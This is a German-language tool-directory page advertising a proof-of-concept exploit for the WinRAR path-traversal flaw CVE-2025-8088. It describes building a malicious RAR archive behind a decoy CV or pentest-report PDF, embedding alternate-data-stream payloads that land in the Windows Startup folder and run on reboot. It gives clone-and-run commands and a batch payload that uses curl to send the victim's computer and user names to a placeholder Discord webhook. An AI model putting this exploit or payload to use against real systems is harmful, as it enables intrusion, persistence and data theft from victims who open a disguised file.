Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8088-Exploit — Ein Proof-of-Concept-Exploit für die WinRAR-Sicherheitslücke (CVE-2025-8088), die Versionen 7.12 und niedriger betrifft. Dieses Tool erstellt ein schädliches RAR-Archiv, das Payloads in Alternate Data Streams (ADS) mit Path Traversal einbettet, was potenziell zur Ausführung beliebigen Codes führt. | Kitploit
Tools/GitHubGitHub/techcorp/
cve-2025-8088-exploit
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingBinary-Exploitation
GitHubtechcorp/cve-2025-8088-exploit

CVE-2025-8088-Exploit

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Ein Proof-of-Concept-Exploit für die WinRAR-Sicherheitslücke (CVE-2025-8088), die Versionen 7.12 und niedriger betrifft. Dieses Tool erstellt ein schädliches RAR-Archiv, das Payloads in Alternate Data Streams (ADS) mit Path Traversal einbettet, was potenziell zur Ausführung beliebigen Codes führt.

Teilen

CVE-2025-8088 WinRAR-Exploit 🔓

Ein Proof-of-Concept-Exploit für die WinRAR-Sicherheitslücke (CVE-2025-8088), die Version 7.12 und ältere betrifft. Dieses Tool erstellt ein bösartiges RAR-Archiv, das Payloads in Alternate Data Streams (ADS) mit Path Traversal einbettet und möglicherweise zur Ausführung beliebigen Codes führt.

  • Das Problem bei vielen anderen Exploits ist, dass sie keine mehrfachen ADS-Streams einbetten, sodass man entweder Glück mit dem richtigen Path Traversal haben muss oder den genauen Benutzernamen bzw. das Extraktionsverzeichnis kennen muss.

🚀 So funktioniert es

  1. Erstellt ein Täuschungsdokument 📄 – Generiert ein professionell aussehendes PDF (Lebenslauf oder Pentest-Bericht)
  2. Bettet mehrere ADS-Streams ein 🔄 – Hängt Payload-Streams mit unterschiedlichen Path-Traversal-Tiefen an
  3. Manipuliert RAR-Header ⚙️ – Ändert die Archivstruktur, um die Path-Traversal-Sicherheitslücke auszunutzen
  4. Legt Payload im Autostart ab 📂 – Versucht, beim Extrahieren die Payload in den Windows-Autostart-Ordner zu schreiben

🛠️ Verwendung

root@kitploit:~
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py

✏️ Payload-Anpassung

Bearbeiten Sie die Payload, um einen Discord-Webhook aufzurufen:

root@kitploit:~
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

Ersetzen Sie YOUR_DISCORD_WEBHOOK_URL durch Ihre tatsächliche Webhook-URL.

🔄 Ablauf

  1. Das Opfer extrahiert die RAR-Datei mit verwundbarem WinRAR (≤7.12)
  2. Die Payload wird in den Autostart-Ordner geschrieben:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Beim nächsten Neustart ➡️ wird die Payload automatisch ausgeführt

📋 Anforderungen

  • Windows-Betriebssystem 🪟
  • Python 3.x 🐍
  • WinRAR installiert
  • ReportLab-Bibliothek (pip install reportlab)
Tool herunterladen